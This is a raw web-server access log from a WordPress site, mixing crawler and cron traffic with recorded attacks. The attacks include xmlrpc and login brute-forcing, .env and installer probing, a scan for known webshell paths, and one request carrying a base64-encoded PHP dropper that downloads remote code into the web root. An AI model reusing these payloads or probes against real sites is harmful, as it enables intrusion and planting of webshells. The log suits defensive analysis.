139.59.16.194 - - [01/Apr/2025:09:13:05 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
216.244.66.236 - - [01/Apr/2025:09:17:51 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.58 - - [01/Apr/2025:09:26:48 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
85.208.98.23 - - [01/Apr/2025:09:31:05 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:09:31:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743514264.9866099357604980468750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:09:31:02 -0400] "GET /10-things-you-should-know-before-shipping-your-car-overseas/feed/ HTTP/1.1" 200 471 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:09:35:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743514516.5552330017089843750000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:09:35:13 -0400] "GET /exploring-the-multicanais-phenomenon/feed/ HTTP/1.1" 200 435 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:09:40:26 -0400] "POST /wp-cron.php?doing_wp_cron=1743514826.4806909561157226562500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
103.186.185.28 - - [01/Apr/2025:09:40:24 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
198.54.114.83 - - [01/Apr/2025:09:53:59 -0400] "POST /wp-cron.php?doing_wp_cron=1743515639.6765170097351074218750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
103.169.35.190 - - [01/Apr/2025:09:53:57 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1"
162.0.215.103 - - [01/Apr/2025:10:07:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
172.245.255.182 - - [01/Apr/2025:10:15:14 -0400] "GET /a-journey-into-skincare/ HTTP/1.1" 200 0 "http://bakingsecurityin.com/a-journey-into-skincare/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
172.245.255.182 - - [01/Apr/2025:10:15:15 -0400] "GET / HTTP/1.1" 200 0 "http://bakingsecurityin.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:10:17:43 -0400] "POST /wp-cron.php?doing_wp_cron=1743517063.0158519744873046875000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:10:17:40 -0400] "GET /what-is-online-sports-betting/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [01/Apr/2025:10:20:08 -0400] "GET /fishing-pickup-lines HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:10:20:12 -0400] "POST /wp-cron.php?doing_wp_cron=1743517211.3068261146545410156250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:10:20:37 -0400] "GET /how-to-find-a-trustworthy-long-distance-moving-company/feed/ HTTP/1.1" 200 464 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [01/Apr/2025:10:21:02 -0400] "GET /meilleures-idees-de-decoration-scientifique-pour-votre-salle-de-classe/feed/ HTTP/1.1" 200 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [01/Apr/2025:10:21:26 -0400] "GET /mlb-relay/feed/ HTTP/1.1" 200 412 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:10:23:18 -0400] "POST /wp-cron.php?doing_wp_cron=1743517397.9001250267028808593750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:10:23:17 -0400] "GET /the-michael-kors-jet-set-tote-in-brown-is-a-must-have/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.103.39.36 - - [01/Apr/2025:10:24:27 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [01/Apr/2025:10:24:34 -0400] "POST /wp-cron.php?doing_wp_cron=1743517467.3734309673309326171875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
198.54.114.83 - - [01/Apr/2025:10:40:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743518435.8176240921020507812500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
178.32.112.62 - - [01/Apr/2025:10:40:35 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62"
198.54.114.83 - - [01/Apr/2025:10:56:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743519394.6108551025390625000000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
203.161.63.215 - - [01/Apr/2025:10:56:34 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [01/Apr/2025:11:06:28 -0400] "POST /wp-cron.php?doing_wp_cron=1743519987.8256878852844238281250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:11:06:24 -0400] "GET /vintage-persian-rugs/feed/ HTTP/1.1" 200 424 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [01/Apr/2025:11:06:54 -0400] "GET /window-shutters-gateshead/feed/ HTTP/1.1" 200 425 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.124.95.168 - - [01/Apr/2025:11:13:02 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
198.54.114.83 - - [01/Apr/2025:11:13:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743520387.7334969043731689453125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
91.148.239.130 - - [01/Apr/2025:11:18:52 -0400] "GET /wp-includes/pomo/pomo.php?log=sanane&act=upload&file=wordpress.php&data=PD9waHAKaWYgKGlzc2V0KCRfR0VUWyd1J10pKSB7CiAgICAkdXJsID0gJF9HRVRbJ3UnXTsKICAgIGlmIChmaWx0ZXJfdmFyKCR1cmwsIEZJTFRFUl9WQUxJREFURV9VUkwpKSB7CiAgICAgICAgJGZpbGVDb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CiAgICAgICAgaWYgKCRmaWxlQ29udGVudCAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgJGZpbGVOYW1lID0gYmFzZW5hbWUocGFyc2VfdXJsKCR1cmwsIFBIUF9VUkxfUEFUSCkpOwogICAgICAgICAgICAkZmlsZU5hbWVXaXRob3V0RXh0ID0gcGF0aGluZm8oJGZpbGVOYW1lLCBQQVRISU5GT19GSUxFTkFNRSk7CiAgICAgICAgICAgICRuZXdGaWxlTmFtZSA9ICRmaWxlTmFtZVdpdGhvdXRFeHQgLiAnLnBocCc7CiAgICAgICAgICAgICRzYXZlUGF0aCA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAnLycgLiAkbmV3RmlsZU5hbWU7CiAgICAgICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCRzYXZlUGF0aCwgJGZpbGVDb250ZW50KTsKICAgICAgICAgICAgZWNobyAiRG9zeWEga2F5ZGVkaWxkaTogIiAuICRuZXdGaWxlTmFtZTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBlY2hvICJEb3N5YSBpw6dlcmnEn2kgYWzEsW5hbWFkxLEuIjsKICAgICAgICB9CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkdlw6dlcnNpeiBVUkwuIjsKICAgIH0KfSBlbHNlIHsKICAgIGVjaG8gIlVSTCBiZWxpcnRpbG1lZGkuIjsKfQo/Pgo= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:11:18:56 -0400] "POST /wp-cron.php?doing_wp_cron=1743520734.6812479496002197265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:11:37:55 -0400] "GET /robots.txt HTTP/1.1" 200 116 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:11:46:28 -0400] "POST /wp-cron.php?doing_wp_cron=1743522388.1589889526367187500000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:11:46:25 -0400] "GET /exploring-nusa-penida-a-hidden-gem-of-bali/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [01/Apr/2025:11:48:28 -0400] "GET /exploring-the-elegance-of-lentoria-condo/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:11:48:32 -0400] "POST /wp-cron.php?doing_wp_cron=1743522510.8564169406890869140625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
103.151.123.101 - - [01/Apr/2025:11:53:05 -0400] "GET /.env HTTP/1.1" 200 0 "-" "python-requests/2.32.3"
198.54.114.83 - - [01/Apr/2025:11:53:08 -0400] "POST /wp-cron.php?doing_wp_cron=1743522786.7867980003356933593750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
85.208.98.23 - - [01/Apr/2025:12:01:03 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.244.66.236 - - [01/Apr/2025:12:23:25 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:12:33:45 -0400] "POST /wp-cron.php?doing_wp_cron=1743525225.3692140579223632812500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.66.236 - - [01/Apr/2025:12:33:41 -0400] "GET /exploring-the-hillhaven-showflat/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [01/Apr/2025:12:33:49 -0400] "GET /innovations-in-ppr-pipe-manufacturing/feed/ HTTP/1.1" 200 440 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:12:35:59 -0400] "POST /wp-cron.php?doing_wp_cron=1743525359.2358679771423339843750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
82.156.199.117 - - [01/Apr/2025:12:35:56 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
85.208.98.23 - - [01/Apr/2025:12:47:36 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:12:53:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743526414.4761381149291992187500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
13.229.78.155 - - [01/Apr/2025:12:53:29 -0400] "GET /wp-cli.php HTTP/1.1" 404 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:13:04:02 -0400] "POST /wp-cron.php?doing_wp_cron=1743527042.6270370483398437500000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
162.240.238.246 - - [01/Apr/2025:13:03:59 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
198.54.114.83 - - [01/Apr/2025:13:11:32 -0400] "POST /wp-cron.php?doing_wp_cron=1743527492.0582010746002197265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
13.229.78.155 - - [01/Apr/2025:13:11:29 -0400] "GET /wp-admin/install.php?step=1 HTTP/1.1" 200 523 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:34 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 409 1222 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
198.54.114.83 - - [01/Apr/2025:13:11:36 -0400] "POST /wp-cron.php?doing_wp_cron=1743527496.0171630382537841796875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
13.229.78.155 - - [01/Apr/2025:13:11:35 -0400] "GET /new/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:38 -0400] "GET /new/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:40 -0400] "GET /blog/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:43 -0400] "GET /blog/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:45 -0400] "GET /blogs/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:47 -0400] "GET /blogs/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:48 -0400] "GET /demo/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:49 -0400] "GET /demo/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:50 -0400] "GET /wp/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:50 -0400] "GET /wp/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:52 -0400] "GET /wordpress/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:53 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:54 -0400] "GET /tes/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:56 -0400] "GET /tes/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:11:57 -0400] "GET /test/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:12:00 -0400] "GET /test/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:12:01 -0400] "GET /web/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:12:03 -0400] "GET /web/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:12:05 -0400] "GET /cms/wp-admin/install.php?step=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:12:07 -0400] "GET /cms/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:12:08 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:13:12:10 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
198.54.114.83 - - [01/Apr/2025:13:31:21 -0400] "POST /wp-cron.php?doing_wp_cron=1743528679.2717950344085693359375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
198.54.121.141 - - [01/Apr/2025:13:31:19 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1"
134.209.100.42 - - [01/Apr/2025:13:58:17 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:16 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:18 -0400] "GET /wp-includes/ID3/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:18 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:21 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:26 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:28 -0400] "GET /wp-includes/IXR/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:29 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:30 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:31 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:33 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:33 -0400] "GET /xmlrpc.php HTTP/1.1" 405 60 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:34 -0400] "GET /wp-admin.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:35 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:36 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:37 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:38 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:39 -0400] "GET /WSOEnigma.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:40 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:42 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:07:44 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
47.119.16.237 - - [01/Apr/2025:14:24:15 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
198.54.114.83 - - [01/Apr/2025:14:24:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743531858.2694919109344482421875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
198.54.114.83 - - [01/Apr/2025:14:49:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743533375.0530669689178466796875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
199.188.200.151 - - [01/Apr/2025:14:49:34 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67"
85.208.98.23 - - [01/Apr/2025:14:55:47 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
